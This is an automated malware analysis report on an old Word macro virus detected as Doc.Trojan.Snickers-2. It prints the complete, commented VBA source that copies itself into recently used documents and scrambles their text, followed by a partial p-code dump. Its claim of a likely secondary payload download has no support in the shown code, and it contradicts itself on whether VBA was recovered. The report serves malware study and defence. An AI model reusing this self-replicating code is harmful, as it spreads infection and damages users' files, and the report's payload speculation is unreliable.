Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 18c05c92a9e886fb…

MALICIOUS

Office (OLE)

Size: 29.5 KB
Created: 2000-01-30 13:11:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 5461c1149a674832ac3e2085cf0668ea
SHA-1: ad4d1a6c65d6bb2cfd64589f8db45d2a00dc3ab9
SHA-256: 18c05c92a9e886fbd5479c587902e11181b69d94ca47477256f63f02ab666814
Risk score: 240

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic)

The sample is a legacy Word document containing VBA macros, specifically an AutoOpen macro that copies the autoopen and autoclose macros into the other documents it opens and marks each infected file with the document variable "snickers". The 'crypt' subroutine obfuscates and deobfuscates the document's text by swapping adjacent character pairs, so running it a second time restores the original. The ClamAV detection as 'Doc.Trojan.Snickers-2' strongly suggests malicious intent, likely involving the download and execution of a secondary payload.

Heuristics (5)

  • ClamAV: Doc.Trojan.Snickers-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Snickers-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4809 bytes
SHA-256: e45a7b4b873227d5bc9f9eaf4db00190fd3a167dd079cdc3452bb8d9410a970f
Detection: ClamAV: Doc.Trojan.Snickers-2
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "autoopen"

Public Sub MAIN()
    Dim a$
    Dim a_
    Dim b$
    WordBasic.ScreenUpdating
    WordBasic.DisableAutoMacros
    a$ = WordBasic.[FileName$]()                   ' name of the current (already infected) document
    For a_ = 1 To WordBasic.CountFiles()           ' walk the recently used file list
        If WordBasic.[Files$](WordBasic.[FileName$](a_)) <> "" Then   ' file still exists on disk
            WordBasic.FileList a_                  ' open the a_-th recent file
            b$ = WordBasic.[FileName$]()
            If a$ <> b$ Then
                If WordBasic.[GetDocumentVar$]("snickers") = "" Then   ' not yet marked as infected
                    WordBasic.MacroCopy a$ + ":autoopen", b$ + ":"     ' replicate both macros into the other document
                    WordBasic.MacroCopy a$ + ":autoclose", b$ + ":"
                    crypt                                              ' scramble its text before saving
                    WordBasic.SetDocumentVar "snickers", "mmmhh"       ' infection marker checked above
                    WordBasic.FileSaveAs Format:=1                     ' save in template format so the macros persist
                End If
                WordBasic.FileClose
            End If
        End If
    Next
    crypt                                          ' unscramble the current document's text for display
    WordBasic.DisableAutoMacros 0
End Sub
Private Sub crypt()
    Dim a$
    Dim a_
    Dim b$
    WordBasic.EditSelectAll
    a$ = WordBasic.[Selection$]()                  ' entire document text
    On Error Resume Next
    For a_ = 1 To Len(a$) Step 2                   ' swap every adjacent pair of characters;
        b$ = b$ + Mid(a$, a_ + 1, 1)               ' applying crypt twice restores the original text
        b$ = b$ + Mid(a$, a_, 1)
    Next
    WordBasic.Insert b$                            ' replace the selection with the swapped text
    WordBasic.WW6_EditClear -1                     ' delete one character backward from the insertion point
    WordBasic.StartOfDocument
End Sub

Attribute VB_Name = "autoclose"

Public Sub MAIN()
    WordBasic.ScreenUpdating
    WordBasic.Call "autoopen.crypt"                ' re-scramble the text on close, so the saved file stays obfuscated
    WordBasic.FileSave
End Sub

' Processing file: /opt/analyzer/scan_staging/c6b3c0521acc4cdab338c9a005f644b0.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/autoopen - 2638 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Public Sub MAIN())
' Line #2:
' 	Dim 
' 	VarDefn a
' Line #3:
' 	Dim 
' 	VarDefn a_
' Line #4:
' 	Dim 
' 	VarDefn B
' Line #5:
' 	Ld WordBasic 
' 	ArgsMemCall ScreenUpdating 0x0000 
' Line #6:
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0000 
' Line #7:
' 	Ld WordBasic 
' 	ArgsMemLd [FileName$] 0x0000 
' 	St a$ 
' Line #8:
' 	StartForVariable 
' 	Ld a_ 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld WordBasic 
' 	ArgsMemLd CountFiles 0x0000 
' 	For 
' Line #9:
' 	Ld a_ 
' 	Ld WordBasic 
' 	ArgsMemLd [FileName$] 0x0001 
' 	Ld WordBasic 
' 	ArgsMemLd [Files$] 0x0001 
' 	LitStr 0x0000 ""
' 	Ne 
' 	IfBlock 
' Line #10:
' 	Ld a_ 
' 	Ld WordBasic 
' 	ArgsMemCall FileList 0x0001 
' Line #11:
' 	Ld WordBasic 
' 	ArgsMemLd [FileName$] 0x0000 
' 	St B$ 
' Line #12:
' 	Ld a$ 
' 	Ld B$ 
' 	Ne 
' 	IfBlock 
' Line #13:
' 	LitStr 0x0008 "snickers"
' 	Ld WordBasic 
' 	ArgsMemLd [GetDocumentVar$] 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #14:
' 	Ld a$ 
' 	LitStr 0x0009 ":autoopen"
' 	Add 
' 	Ld B$ 
' 	LitStr 0x0001 ":"
' 	Add 
' 	Ld WordBasic 
' 	ArgsMemCall MacroCopy 0x0002 
' Line #15:
' 	Ld a$ 
' 	LitStr 0x000A ":autoclose"
' 	Add 
' 	Ld B$ 
' 	LitStr 0x0001 ":"
' 	Add 
' 	Ld WordBasic 
' 	ArgsMemCall MacroCopy 0x0002 
' Line #16:
' 	ArgsCall crypt 0x0000 
' Line #17:
' 	LitStr 0x0008 "snickers"
' 	LitStr 0x0005 "mmmhh"
' 	Ld WordBasic 
' 	ArgsMemCall SetDocumentVar 0x0002 
' Line #18:
' 	LitDI2 0x0001 
' 	ParamNamed Format$ 
' 	Ld WordBasic 
' 	ArgsMemCall FileSaveAs 0x0001 
' Line #19:
' 	EndIfBlock 
' Line #20:
' 	Ld WordBasic 
' 	ArgsMemCall FileClose 0x0000 
' Line #21:
' 	EndIfBlock 
' Line #22:
' 	EndIfBlock 
' Line #23:
' 	StartForVariable 
' 	Next 
' Line #24:
' 	ArgsCall crypt 0x0000 
' Line #25:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #26:
' 	EndSub 
' Line #27:
' 	FuncDefn (Private Sub crypt())
' Line #28:
' 	Dim 
' 	VarDefn a
' Line #29:
' 	Dim 
' 	VarDefn a_
' Line #30:
' 	Dim 
' 	VarDefn B
' Line #31:
' 	Ld WordBasic 
' 	ArgsMemCall EditSelectAll 0x0000 
' Line #32:
' 	Ld WordBasic 
' 	ArgsMemLd [Selection$] 0x0000 
' 	St a$ 
' Line #33:
' 	OnError (Resume Next) 
' Line #34:
' 	StartForVariable 
' 	Ld a_ 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld a$ 
' 	FnLen 
' 	LitDI2 0x0002 
' 	ForStep 
' Line #35:
' 	Ld B$ 
' 	Ld a$ 
' 	Ld a_ 
' 	LitDI2 0x0001 
' 	Add 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	Add 
' 	St B$ 
' Line #36
... (truncated)